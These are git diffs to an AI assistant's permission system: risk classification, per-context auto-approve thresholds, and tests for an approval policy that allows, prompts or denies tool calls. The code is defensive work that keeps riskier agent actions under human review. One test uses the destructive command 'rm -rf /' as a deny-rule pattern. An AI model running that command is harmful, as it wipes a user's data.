             expect([RiskLevel.Low, RiskLevel.Medium, RiskLevel.High]).toContain(
-              risk,
+              risk.level,
             );
           },
         ),
@@ -417,7 +417,7 @@ describe("Shell parser property-based tests", () => {
 
     test("empty command classifies as low risk", async () => {
       const risk = await classifyRisk("bash", { command: "" });
-      expect(risk).toBe(RiskLevel.Low);
+      expect(risk.level).toBe(RiskLevel.Low);
     });
 
     test("whitespace-only commands classify as low risk (trimmed to empty)", async () => {
@@ -429,7 +429,7 @@ describe("Shell parser property-based tests", () => {
           }),
           async (ws) => {
             const risk = await classifyRisk("bash", { command: ws });
-            expect(risk).toBe(RiskLevel.Low);
+            expect(risk.level).toBe(RiskLevel.Low);
           },
         ),
         { numRuns: 50, ...FC_OPTS },

--- a/assistant/src/__tests__/tool-execution-pipeline.benchmark.test.ts
+++ b/assistant/src/__tests__/tool-execution-pipeline.benchmark.test.ts
@@ -202,7 +202,7 @@ describe("Tool execution pipeline benchmark", () => {
     expect(p50).toBeLessThan(15);
     expect(p95).toBeLessThan(40);
     // Verify correctness: ls should be low risk
-    expect(results[0]).toBe(RiskLevel.Low);
+    expect(results[0].level).toBe(RiskLevel.Low);
   });
 
   test("classifyRisk: medium-risk tool (file_write)", async () => {
@@ -213,7 +213,7 @@ describe("Tool execution pipeline benchmark", () => {
 
     const p50 = percentile(timings, 50);
     expect(p50).toBeLessThan(5);
-    expect(results[0]).toBe(RiskLevel.Low);
+    expect(results[0].level).toBe(RiskLevel.Low);
   });
 
   test("check: full permission check for low-risk tool", async () => {

--- a/assistant/src/__tests__/tool-executor-lifecycle-events.test.ts
+++ b/assistant/src/__tests__/tool-executor-lifecycle-events.test.ts
@@ -64,7 +64,7 @@ mock.module("../util/logger.js", () => ({
 }));
 
 mock.module("../permissions/checker.js", () => ({
-  classifyRisk: async () => checkerRisk,
+  classifyRisk: async () => ({ level: checkerRisk }),
   check: async () => ({ decision: checkerDecision, reason: checkerReason }),
   generateAllowlistOptions: () => [
     { label: "exact", description: "exact", pattern: "exact" },

--- a/assistant/src/__tests__/tool-executor.test.ts
+++ b/assistant/src/__tests__/tool-executor.test.ts
@@ -109,7 +109,7 @@ mock.module("../util/logger.js", () => ({
 }));
 
 mock.module("../permissions/checker.js", () => ({
-  classifyRisk: async () => "low",
+  classifyRisk: async () => ({ level: "low" }),
   check: async (
     toolName: string,
     input: Record<string, unknown>,

--- a/assistant/src/__tests__/tool-executor.test.ts
+++ b/assistant/src/__tests__/tool-executor.test.ts
@@ -309,6 +309,8 @@ describe("ToolExecutor policy context plumbing", () => {
     expect(result.isError).toBe(false);
     expect(lastCheckArgs).toBeDefined();
     expect(lastCheckArgs!.policyContext).toEqual({
+      executionContext: "conversation",
+      ephemeralRules: undefined,
       executionTarget: "sandbox",
     });
   });
@@ -326,7 +328,10 @@ describe("ToolExecutor policy context plumbing", () => {
 
     expect(result.isError).toBe(false);
     expect(lastCheckArgs).toBeDefined();
-    expect(lastCheckArgs!.policyContext).toBeUndefined();
+    expect(lastCheckArgs!.policyContext).toEqual({
+      executionContext: "conversation",
+      ephemeralRules: undefined,
+    });
   });
 
   test('passes undefined policyContext for tools with origin "core"', async () => {
@@ -356,7 +361,10 @@ describe("ToolExecutor policy context plumbing", () => {
 
     expect(result.isError).toBe(false);
     expect(lastCheckArgs).toBeDefined();
-    expect(lastCheckArgs!.policyContext).toBeUndefined();
+    expect(lastCheckArgs!.policyContext).toEqual({
+      executionContext: "conversation",
+      ephemeralRules: undefined,
+    });
   });
 
   test('includes executionTarget "host" from skill tool metadata', async () => {
@@ -390,6 +398,8 @@ describe("ToolExecutor policy context plumbing", () => {
     expect(result.isError).toBe(false);
     expect(lastCheckArgs).toBeDefined();
     expect(lastCheckArgs!.policyContext).toEqual({
+      executionContext: "conversation",
+      ephemeralRules: undefined,
       executionTarget: "host",
     });
   });
@@ -420,6 +430,8 @@ describe("ToolExecutor policy context plumbing", () => {
     expect(result.isError).toBe(false);
     expect(lastCheckArgs).toBeDefined();
     expect(lastCheckArgs!.policyContext).toEqual({
+      executionContext: "conversation",
+      ephemeralRules: undefined,
       executionTarget: undefined,
     });
   });
@@ -889,6 +901,8 @@ describe("ToolExecutor strict mode + high-risk integration (PR 25)", () => {
 
     expect(lastCheckArgs).toBeDefined();
     expect(lastCheckArgs!.policyContext).toEqual({
+      executionContext: "conversation",
+      ephemeralRules: undefined,
       executionTarget: "sandbox",
     });
   });
@@ -1071,6 +1085,8 @@ describe("ToolExecutor strict mode + high-risk integration (PR 25)", () => {
 
     expect(lastCheckArgs).toBeDefined();
     expect(lastCheckArgs!.policyContext).toEqual({
+      executionContext: "conversation",
+      ephemeralRules: undefined,
       executionTarget: "sandbox",
     });
   });

--- a/assistant/src/__tests__/verification-control-plane-policy.test.ts
+++ b/assistant/src/__tests__/verification-control-plane-policy.test.ts
@@ -67,7 +67,7 @@ mock.module("../util/logger.js", () => ({
 }));
 
 mock.module("../permissions/checker.js", () => ({
-  classifyRisk: async () => "low",
+  classifyRisk: async () => ({ level: "low" }),
   check: async () => ({ decision: "allow", reason: "allowed" }),
   generateAllowlistOptions: () => [],
   generateScopeOptions: () => [],

--- a/assistant/src/config/schemas/security.ts
+++ b/assistant/src/config/schemas/security.ts
@@ -88,14 +88,37 @@ export const PermissionsConfigSchema = z
         "Whether the assistant can execute commands on the host machine without prompting",
       ),
     autoApproveUpTo: z
-      .enum(["none", "low", "medium"], {
-        error: "permissions.autoApproveUpTo must be one of: none, low, medium",
-      })
+      .union([
+        z.enum(["none", "low", "medium"], {
+          error:
+            "permissions.autoApproveUpTo must be one of: none, low, medium",
+        }),
+        z.object({
+          conversation: z
+            .enum(["none", "low", "medium"])
+            .default("low")
+            .describe(
+              "Threshold for interactive conversation sessions (default: low)",
+            ),
+          background: z
+            .enum(["none", "low", "medium"])
+            .default("medium")
+            .describe(
+              "Threshold for non-interactive guardian sessions (default: medium)",
+            ),
+          headless: z
+            .enum(["none", "low", "medium"])
+            .default("none")
+            .describe(
+              "Threshold for non-interactive non-guardian sessions (default: none)",
+            ),
+        }),
+      ])
       .default("low")
       .describe(
         "Auto-approve tools at or below this risk level without prompting. " +
-          "'none' prompts for everything (strictest), 'low' auto-approves read-only " +
-          "operations (default), 'medium' auto-approves writes and network access too.",
+          "Accepts a scalar ('none', 'low', 'medium') applied to all contexts, " +
+          "or an object with per-context overrides: { conversation, background, headless }.",
       ),
   })
   .describe("Permission enforcement mode for tool operations");

--- a/assistant/src/config/schemas/security.ts
+++ b/assistant/src/config/schemas/security.ts
@@ -114,7 +114,7 @@ export const PermissionsConfigSchema = z
             ),
         }),
       ])
-      .default("low")
+      .default({ conversation: "low", background: "medium", headless: "none" })
       .describe(
         "Auto-approve tools at or below this risk level without prompting. " +
           "Accepts a scalar ('none', 'low', 'medium') applied to all contexts, " +

--- a/assistant/src/config/schemas/security.ts
+++ b/assistant/src/config/schemas/security.ts
@@ -87,6 +87,16 @@ export const PermissionsConfigSchema = z
       .describe(
         "Whether the assistant can execute commands on the host machine without prompting",
       ),
+    autoApproveUpTo: z
+      .enum(["none", "low", "medium"], {
+        error: "permissions.autoApproveUpTo must be one of: none, low, medium",
+      })
+      .default("low")
+      .describe(
+        "Auto-approve tools at or below this risk level without prompting. " +
+          "'none' prompts for everything (strictest), 'low' auto-approves read-only " +
+          "operations (default), 'medium' auto-approves writes and network access too.",
+      ),
   })
   .describe("Permission enforcement mode for tool operations");
 

--- a/assistant/src/daemon/conversation-attachments.ts
+++ b/assistant/src/daemon/conversation-attachments.ts
@@ -107,7 +107,7 @@ export async function approveHostAttachmentRead(
   const response = await prompter.prompt(
     toolName,
     input,
-    await classifyRisk(toolName, input, workingDir),
+    (await classifyRisk(toolName, input, workingDir)).level,
     await generateAllowlistOptions(toolName, input),
     generateScopeOptions(workingDir, toolName),
     undefined,

--- a/assistant/src/permissions/approval-policy.test.ts
+++ b/assistant/src/permissions/approval-policy.test.ts
@@ -797,3 +797,152 @@ describe("resolveThreshold", () => {
     });
   });
 });
+
+// ── Guardian threshold-based auto-approve ────────────────────────────────────
+// These tests verify the ordinal comparison used in permission-checker.ts
+// to decide whether a guardian non-interactive session should auto-approve.
+// The comparison logic: riskOrdinal <= thresholdOrdinal.
+
+describe("guardian threshold-based auto-approve (ordinal comparison)", () => {
+  // Helper that mirrors the ordinal comparison from permission-checker.ts.
+  // This is the logic that replaces the old `riskLevel !== RiskLevel.High` check.
+  function isWithinThreshold(
+    riskLevel: RiskLevel,
+    bgThreshold: "none" | "low" | "medium",
+  ): boolean {
+    const thresholdOrdinal: Record<string, number> = {
+      none: -1,
+      low: 0,
+      medium: 1,
+    };
+    const riskOrdinal: Record<string, number> = {
+      [RiskLevel.Low]: 0,
+      [RiskLevel.Medium]: 1,
+      [RiskLevel.High]: 2,
+    };
+    return (
+      (riskOrdinal[riskLevel] ?? 2) <= (thresholdOrdinal[bgThreshold] ?? 0)
+    );
+  }
+
+  describe('default config (background: "medium") — behavioral parity with old riskLevel !== High', () => {
+    test("Low risk → within threshold (auto-approve)", () => {
+      const bgThreshold = resolveThreshold(
+        { conversation: "low", background: "medium", headless: "none" },
+        "background",
+      );
+      expect(bgThreshold).toBe("medium");
+      expect(isWithinThreshold(RiskLevel.Low, bgThreshold)).toBe(true);
+    });
+
+    test("Medium risk → within threshold (auto-approve)", () => {
+      const bgThreshold = resolveThreshold(
+        { conversation: "low", background: "medium", headless: "none" },
+        "background",
+      );
+      expect(isWithinThreshold(RiskLevel.Medium, bgThreshold)).toBe(true);
+    });
+
+    test("High risk → above threshold (prompt)", () => {
+      const bgThreshold = resolveThreshold(
+        { conversation: "low", background: "medium", headless: "none" },
+        "background",
+      );
+      expect(isWithinThreshold(RiskLevel.High, bgThreshold)).toBe(false);
+    });
+  });
+
+  describe('tighter config (background: "low") — only Low auto-approves', () => {
+    test("Low risk → within threshold", () => {
+      const bgThreshold = resolveThreshold(
+        { conversation: "low", background: "low", headless: "none" },
+        "background",
+      );
+      expect(bgThreshold).toBe("low");
+      expect(isWithinThreshold(RiskLevel.Low, bgThreshold)).toBe(true);
+    });
+
+    test("Medium risk → above threshold (prompt)", () => {
+      const bgThreshold = resolveThreshold(
+        { conversation: "low", background: "low", headless: "none" },
+        "background",
+      );
+      expect(isWithinThreshold(RiskLevel.Medium, bgThreshold)).toBe(false);
+    });
+
+    test("High risk → above threshold (prompt)", () => {
+      const bgThreshold = resolveThreshold(
+        { conversation: "low", background: "low", headless: "none" },
+        "background",
+      );
+      expect(isWithinThreshold(RiskLevel.High, bgThreshold)).toBe(false);
+    });
+  });
+
+  describe('strictest config (background: "none") — nothing auto-approves', () => {
+    test("Low risk → above threshold (prompt)", () => {
+      const bgThreshold = resolveThreshold(
+        { conversation: "low", background: "none", headless: "none" },
+        "background",
+      );
+      expect(bgThreshold).toBe("none");
+      expect(isWithinThreshold(RiskLevel.Low, bgThreshold)).toBe(false);
+    });
+
+    test("Medium risk → above threshold (prompt)", () => {
+      const bgThreshold = resolveThreshold(
+        { conversation: "low", background: "none", headless: "none" },
+        "background",
+      );
+      expect(isWithinThreshold(RiskLevel.Medium, bgThreshold)).toBe(false);
+    });
+
+    test("High risk → above threshold (prompt)", () => {
+      const bgThreshold = resolveThreshold(
+        { conversation: "low", background: "none", headless: "none" },
+        "background",
+      );
+      expect(isWithinThreshold(RiskLevel.High, bgThreshold)).toBe(false);
+    });
+  });
+
+  describe("scalar config form resolves correctly for background context", () => {
+    test('scalar "medium" → background resolves to medium', () => {
+      expect(resolveThreshold("medium", "background")).toBe("medium");
+    });
+
+    test('scalar "low" → background resolves to low', () => {
+      expect(resolveThreshold("low", "background")).toBe("low");
+    });
+
+    test('scalar "none" → background resolves to none', () => {
+      expect(resolveThreshold("none", "background")).toBe("none");
+    });
+  });
+
+  describe("default (undefined) resolves per-context defaults", () => {
+    test("undefined config → medium threshold for background", () => {
+      const bgThreshold = resolveThreshold(undefined, "background");
+      expect(bgThreshold).toBe("medium");
+      // Low and Medium risk are within threshold, High is not
+      expect(isWithinThreshold(RiskLevel.Low, bgThreshold)).toBe(true);
+      expect(isWithinThreshold(RiskLevel.Medium, bgThreshold)).toBe(true);
+      expect(isWithinThreshold(RiskLevel.High, bgThreshold)).toBe(false);
+    });
+
+    test("undefined config → low threshold for conversation", () => {
+      const convThreshold = resolveThreshold(undefined, "conversation");
+      expect(convThreshold).toBe("low");
+    });
+
+    test("undefined config → none threshold for headless", () => {
+      const hlThreshold = resolveThreshold(undefined, "headless");
+      expect(hlThreshold).toBe("none");
+    });
+
+    test("undefined config + no context → low (conversation default)", () => {
+      const threshold = resolveThreshold(undefined);
+      expect(threshold).toBe("low");
+    });
+  });
+});

--- a/assistant/src/permissions/approval-policy.test.ts
+++ b/assistant/src/permissions/approval-policy.test.ts
@@ -1,0 +1,509 @@
+import { describe, expect, test } from "bun:test";
+
+import type { ApprovalContext, ApprovalDecision } from "./approval-policy.js";
+import { DefaultApprovalPolicy } from "./approval-policy.js";
+import type { TrustRule } from "./types.js";
+import { RiskLevel } from "./types.js";
+
+// ── Helpers ──────────────────────────────────────────────────────────────────
+
+const policy = new DefaultApprovalPolicy();
+
+function makeRule(
+  overrides: Partial<TrustRule> & { decision: TrustRule["decision"] },
+): TrustRule {
+  return {
+    id: "test-rule",
+    tool: "bash",
+    pattern: "test-pattern",
+    priority: 100,
+    createdAt: Date.now(),
+    ...overrides,
+  };
+}
+
+function makeContext(overrides: Partial<ApprovalContext>): ApprovalContext {
+  return {
+    riskLevel: RiskLevel.Low,
+    toolName: "bash",
+    permissionsMode: "workspace",
+    isContainerized: false,
+    isWorkspaceScoped: false,
+    ...overrides,
+  };
+}
+
+function evaluate(overrides: Partial<ApprovalContext>): ApprovalDecision {
+  return policy.evaluate(makeContext(overrides));
+}
+
+// ── Deny rule at each risk level ─────────────────────────────────────────────
+
+describe("deny rule", () => {
+  const denyRule = makeRule({ decision: "deny" });
+
+  test("deny at Low risk", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      matchedRule: denyRule,
+    });
+    expect(result.decision).toBe("deny");
+    expect(result.reason).toContain("deny rule");
+  });
+
+  test("deny at Medium risk", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Medium,
+      matchedRule: denyRule,
+    });
+    expect(result.decision).toBe("deny");
+  });
+
+  test("deny at High risk", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.High,
+      matchedRule: denyRule,
+    });
+    expect(result.decision).toBe("deny");
+  });
+});
+
+// ── Ask rule at each risk level ──────────────────────────────────────────────
+
+describe("ask rule", () => {
+  const askRule = makeRule({ decision: "ask" });
+
+  test("ask at Low risk", () => {
+    const result = evaluate({ riskLevel: RiskLevel.Low, matchedRule: askRule });
+    expect(result.decision).toBe("prompt");
+    expect(result.reason).toContain("ask rule");
+  });
+
+  test("ask at Medium risk", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Medium,
+      matchedRule: askRule,
+    });
+    expect(result.decision).toBe("prompt");
+  });
+
+  test("ask at High risk", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.High,
+      matchedRule: askRule,
+    });
+    expect(result.decision).toBe("prompt");
+  });
+});
+
+// ── Allow rule at each risk level ────────────────────────────────────────────
+
+describe("allow rule", () => {
+  const allowRule = makeRule({ decision: "allow" });
+
+  test("allow at Low risk", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      matchedRule: allowRule,
+    });
+    expect(result.decision).toBe("allow");
+    expect(result.reason).toContain("Matched trust rule");
+  });
+
+  test("allow at Medium risk", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Medium,
+      matchedRule: allowRule,
+    });
+    expect(result.decision).toBe("allow");
+    expect(result.reason).toContain("Matched trust rule");
+  });
+
+  test("allow at High risk — non-containerized bash → prompt", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.High,
+      toolName: "bash",
+      matchedRule: allowRule,
+      isContainerized: false,
+    });
+    expect(result.decision).toBe("prompt");
+    expect(result.reason).toContain("High risk");
+  });
+
+  test("allow at High risk — containerized bash → allow (auto-allow)", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.High,
+      toolName: "bash",
+      matchedRule: allowRule,
+      isContainerized: true,
+    });
+    expect(result.decision).toBe("allow");
+    expect(result.reason).toContain("auto-allow-high-risk");
+  });
+
+  test("allow at High risk — non-bash tool, containerized → prompt", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.High,
+      toolName: "file_write",
+      matchedRule: allowRule,
+      isContainerized: true,
+    });
+    expect(result.decision).toBe("prompt");
+    expect(result.reason).toContain("High risk");
+  });
+
+  test("allow at High risk — non-bash tool, non-containerized → prompt", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.High,
+      toolName: "file_write",
+      matchedRule: allowRule,
+      isContainerized: false,
+    });
+    expect(result.decision).toBe("prompt");
+    expect(result.reason).toContain("High risk");
+  });
+});
+
+// ── No rule: third-party skill tool ──────────────────────────────────────────
+
+describe("no rule — third-party skill tool", () => {
+  test("skill origin, not bundled → prompt", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      toolName: "custom_tool",
+      toolOrigin: "skill",
+      isSkillBundled: false,
+    });
+    expect(result.decision).toBe("prompt");
+    expect(result.reason).toContain("Skill tool");
+  });
+
+  test("skill origin, not bundled, Medium risk → prompt", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Medium,
+      toolName: "custom_tool",
+      toolOrigin: "skill",
+      isSkillBundled: false,
+    });
+    expect(result.decision).toBe("prompt");
+    expect(result.reason).toContain("Skill tool");
+  });
+
+  test("no tool origin but hasManifestOverride → prompt (unregistered skill tool)", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      toolName: "unknown_tool",
+      hasManifestOverride: true,
+    });
+    expect(result.decision).toBe("prompt");
+    expect(result.reason).toContain("Skill tool");
+  });
+
+  test("skill origin, bundled → falls through (not third-party)", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      toolName: "bundled_tool",
+      toolOrigin: "skill",
+      isSkillBundled: true,
+    });
+    // Bundled skill + Low risk + no rule → handled by step 9 or 11
+    expect(result.decision).toBe("allow");
+  });
+});
+
+// ── No rule: strict mode ─────────────────────────────────────────────────────
+
+describe("no rule — strict mode", () => {
+  test("strict mode, Low risk → prompt", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      toolName: "file_read",
+      permissionsMode: "strict",
+    });
+    expect(result.decision).toBe("prompt");
+    expect(result.reason).toContain("Strict mode");
+  });
+
+  test("strict mode, Medium risk → prompt", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Medium,
+      toolName: "file_read",
+      permissionsMode: "strict",
+    });
+    expect(result.decision).toBe("prompt");
+    expect(result.reason).toContain("Strict mode");
+  });
+
+  test("strict mode, High risk → prompt", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.High,
+      toolName: "file_read",
+      permissionsMode: "strict",
+    });
+    expect(result.decision).toBe("prompt");
+    expect(result.reason).toContain("Strict mode");
+  });
+
+  test("strict mode blocks bundled skill tools without explicit rule", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      toolName: "bundled_tool",
+      permissionsMode: "strict",
+      toolOrigin: "skill",
+      isSkillBundled: true,
+    });
+    expect(result.decision).toBe("prompt");
+    expect(result.reason).toContain("Strict mode");
+  });
+});
+
+// ── No rule: workspace mode ──────────────────────────────────────────────────
+
+describe("no rule — workspace mode", () => {
+  test("workspace mode, Low risk, workspace-scoped → allow", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      toolName: "file_read",
+      permissionsMode: "workspace",
+      isWorkspaceScoped: true,
+    });
+    expect(result.decision).toBe("allow");
+    expect(result.reason).toContain("Workspace mode");
+  });
+
+  test("workspace mode, Low risk, NOT workspace-scoped → falls through", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      toolName: "file_read",
+      permissionsMode: "workspace",
+      isWorkspaceScoped: false,
+    });
+    // Falls through to risk-based: Low → allow
+    expect(result.decision).toBe("allow");
+    expect(result.reason).toContain("Low risk");
+  });
+
+  test("workspace mode, Medium risk → falls through to risk-based prompt", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Medium,
+      toolName: "file_write",
+      permissionsMode: "workspace",
+      isWorkspaceScoped: true,
+    });
+    expect(result.decision).toBe("prompt");
+    expect(result.reason).toContain("medium risk");
+  });
+
+  test("workspace mode, bash, NOT containerized, Low risk, workspace-scoped → falls through (no auto-allow for host bash)", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      toolName: "bash",
+      permissionsMode: "workspace",
+      isContainerized: false,
+      isWorkspaceScoped: true,
+    });
+    // Non-containerized bash falls through the workspace check.
+    // Then hits risk-based: Low → allow
+    expect(result.decision).toBe("allow");
+    expect(result.reason).toContain("Low risk");
+  });
+
+  test("workspace mode, bash, containerized, Low risk, workspace-scoped → allow via workspace mode", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      toolName: "bash",
+      permissionsMode: "workspace",
+      isContainerized: true,
+      isWorkspaceScoped: true,
+    });
+    expect(result.decision).toBe("allow");
+    expect(result.reason).toContain("Workspace mode");
+  });
+});
+
+// ── No rule: bundled skill tool ──────────────────────────────────────────────
+
+describe("no rule — bundled skill tool", () => {
+  test("bundled skill, Low risk → allow", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      toolName: "bundled_tool",
+      permissionsMode: "workspace",
+      toolOrigin: "skill",
+      isSkillBundled: true,
+    });
+    expect(result.decision).toBe("allow");
+    expect(result.reason).toContain("Bundled skill");
+  });
+
+  test("bundled skill, Medium risk → prompt (only Low auto-allows)", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Medium,
+      toolName: "bundled_tool",
+      permissionsMode: "workspace",
+      toolOrigin: "skill",
+      isSkillBundled: true,
+    });
+    expect(result.decision).toBe("prompt");
+    expect(result.reason).toContain("medium risk");
+  });
+
+  test("bundled skill, High risk → prompt", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.High,
+      toolName: "bundled_tool",
+      permissionsMode: "workspace",
+      toolOrigin: "skill",
+      isSkillBundled: true,
+    });
+    expect(result.decision).toBe("prompt");
+    expect(result.reason).toContain("High risk");
+  });
+});
+
+// ── Risk-based fallback ──────────────────────────────────────────────────────
+
+describe("risk-based fallback (no rule, no special case)", () => {
+  test("High risk → prompt", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.High,
+      toolName: "some_tool",
+    });
+    expect(result.decision).toBe("prompt");
+    expect(result.reason).toContain("High risk");
+  });
+
+  test("Low risk → allow", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      toolName: "some_tool",
+    });
+    expect(result.decision).toBe("allow");
+    expect(result.reason).toContain("Low risk");
+  });
+
+  test("Medium risk → prompt", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Medium,
+      toolName: "some_tool",
+    });
+    expect(result.decision).toBe("prompt");
+    expect(result.reason).toContain("medium risk");
+  });
+});
+
+// ── Edge cases and combined scenarios ────────────────────────────────────────
+
+describe("edge cases", () => {
+  test("deny rule takes precedence over allow-everything else", () => {
+    const denyRule = makeRule({ decision: "deny" });
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      toolName: "bash",
+      matchedRule: denyRule,
+      isContainerized: true,
+      isWorkspaceScoped: true,
+      permissionsMode: "workspace",
+    });
+    expect(result.decision).toBe("deny");
+  });
+
+  test("ask rule takes precedence over allow-for-low", () => {
+    const askRule = makeRule({ decision: "ask" });
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      toolName: "bash",
+      matchedRule: askRule,
+      isContainerized: true,
+    });
+    expect(result.decision).toBe("prompt");
+  });
+
+  test("allow rule High risk falls through to prompt even with workspace mode", () => {
+    const allowRule = makeRule({ decision: "allow" });
+    const result = evaluate({
+      riskLevel: RiskLevel.High,
+      toolName: "file_write",
+      matchedRule: allowRule,
+      permissionsMode: "workspace",
+      isContainerized: false,
+      isWorkspaceScoped: true,
+    });
+    // Allow rule + High risk + non-bash → falls through to risk-based: High → prompt
+    expect(result.decision).toBe("prompt");
+    expect(result.reason).toContain("High risk");
+  });
+
+  test("reason includes the matched rule pattern", () => {
+    const rule = makeRule({ decision: "allow", pattern: "git status" });
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      matchedRule: rule,
+    });
+    expect(result.reason).toContain("git status");
+  });
+
+  test("deny reason includes the matched rule pattern", () => {
+    const rule = makeRule({ decision: "deny", pattern: "rm -rf /" });
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      matchedRule: rule,
+    });
+    expect(result.reason).toContain("rm -rf /");
+  });
+
+  test("strict mode with matched allow rule at Low risk → allow (rule takes precedence)", () => {
+    const allowRule = makeRule({ decision: "allow" });
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      toolName: "file_read",
+      matchedRule: allowRule,
+      permissionsMode: "strict",
+    });
+    expect(result.decision).toBe("allow");
+  });
+
+  test("workspace mode non-containerized bash, Low risk, workspace-scoped → Low risk allow (not workspace allow)", () => {
+    // This is the subtle bash host exception. The workspace mode check
+    // specifically skips bash when not containerized, so it falls through
+    // to the risk-based path where Low risk still auto-allows.
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      toolName: "bash",
+      permissionsMode: "workspace",
+      isContainerized: false,
+      isWorkspaceScoped: true,
+    });
+    expect(result.decision).toBe("allow");
+    // The reason should be "Low risk" not "Workspace mode" — the workspace
+    // auto-allow was bypassed because bash is on the host.
+    expect(result.reason).not.toContain("Workspace mode");
+    expect(result.reason).toContain("Low risk");
+  });
+
+  test("hasManifestOverride with toolOrigin set to skill — third-party check triggers on origin", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      toolName: "manifest_tool",
+      toolOrigin: "skill",
+      isSkillBundled: false,
+      hasManifestOverride: true,
+    });
+    expect(result.decision).toBe("prompt");
+    expect(result.reason).toContain("Skill tool");
+  });
+
+  test("hasManifestOverride with toolOrigin set to builtin — falls through (not a skill)", () => {
+    const result = evaluate({
+      riskLevel: RiskLevel.Low,
+      toolName: "manifest_tool",
+      toolOrigin: "builtin",
+      hasManifestOverride: true,
+    });
+    // toolOrigin is "builtin", so the third-party skill check doesn't trigger.
+    // The hasManifestOverride check requires !toolOrigin, but toolOrigin is set.
+    // Falls through to risk-based: Low → allow.
+    expect(result.decision).toBe("allow");
+    expect(result.reason).toContain("Low risk");
+  });
+});

--- a/assistant/src/permissions/approval-policy.test.ts
+++ b/assistant/src/permissions/approval-policy.test.ts
@@ -131,7 +131,7 @@ describe("allow rule", () => {
       isContainerized: false,
     });
     expect(result.decision).toBe("prompt");
-    expect(result.reason).toContain("High risk");
+    expect(result.reason).toContain("high risk");
     // Decision is driven by risk-based fallback, not the rule
     expect(result.matchedRule).toBeUndefined();
   });
@@ -156,7 +156,7 @@ describe("allow rule", () => {
       isContainerized: true,
     });
     expect(result.decision).toBe("prompt");
-    expect(result.reason).toContain("High risk");
+    expect(result.reason).toContain("high risk");
     // Decision is driven by risk-based fallback, not the rule
     expect(result.matchedRule).toBeUndefined();
   });
@@ -169,7 +169,7 @@ describe("allow rule", () => {
       isContainerized: false,
     });
     expect(result.decision).toBe("prompt");
-    expect(result.reason).toContain("High risk");
+    expect(result.reason).toContain("high risk");
     // Decision is driven by risk-based fallback, not the rule
     expect(result.matchedRule).toBeUndefined();
   });
@@ -289,9 +289,9 @@ describe("no rule — workspace mode", () => {
       permissionsMode: "workspace",
       isWorkspaceScoped: false,
     });
-    // Falls through to risk-based: Low → allow
+    // Falls through to risk-based: Low → allow (within default "low" threshold)
     expect(result.decision).toBe("allow");
-    expect(result.reason).toContain("Low risk");
+    expect(result.reason).toContain("low risk");
   });
 
   test("workspace mode, Medium risk → falls through to risk-based prompt", () => {
@@ -314,9 +314,9 @@ describe("no rule — workspace mode", () => {
       isWorkspaceScoped: true,
     });
     // Non-containerized bash falls through the workspace check.
-    // Then hits risk-based: Low → allow
+    // Then hits risk-based: Low → allow (within default "low" threshold)
     expect(result.decision).toBe("allow");
-    expect(result.reason).toContain("Low risk");
+    expect(result.reason).toContain("low risk");
   });
 
   test("workspace mode, bash, containerized, Low risk, workspace-scoped → allow via workspace mode", () => {
@@ -368,7 +368,7 @@ describe("no rule — bundled skill tool", () => {
       isSkillBundled: true,
     });
     expect(result.decision).toBe("prompt");
-    expect(result.reason).toContain("High risk");
+    expect(result.reason).toContain("high risk");
   });
 });
 
@@ -381,7 +381,7 @@ describe("risk-based fallback (no rule, no special case)", () => {
       toolName: "some_tool",
     });
     expect(result.decision).toBe("prompt");
-    expect(result.reason).toContain("High risk");
+    expect(result.reason).toContain("high risk");
   });
 
   test("Low risk → allow", () => {
@@ -390,7 +390,7 @@ describe("risk-based fallback (no rule, no special case)", () => {
       toolName: "some_tool",
     });
     expect(result.decision).toBe("allow");
-    expect(result.reason).toContain("Low risk");
+    expect(result.reason).toContain("low risk");
   });
 
   test("Medium risk → prompt", () => {
@@ -442,7 +442,7 @@ describe("edge cases", () => {
     });
     // Allow rule + High risk + non-bash → falls through to risk-based: High → prompt
     expect(result.decision).toBe("prompt");
-    expect(result.reason).toContain("High risk");
+    expect(result.reason).toContain("high risk");
   });
 
   test("reason includes the matched rule pattern", () => {
@@ -474,7 +474,7 @@ describe("edge cases", () => {
     expect(result.decision).toBe("allow");
   });
 
-  test("workspace mode non-containerized bash, Low risk, workspace-scoped → Low risk allow (not workspace allow)", () => {
+  test("workspace mode non-containerized bash, Low risk, workspace-scoped → low risk allow (not workspace allow)", () => {
     // This is the subtle bash host exception. The workspace mode check
     // specifically skips bash when not containerized, so it falls through
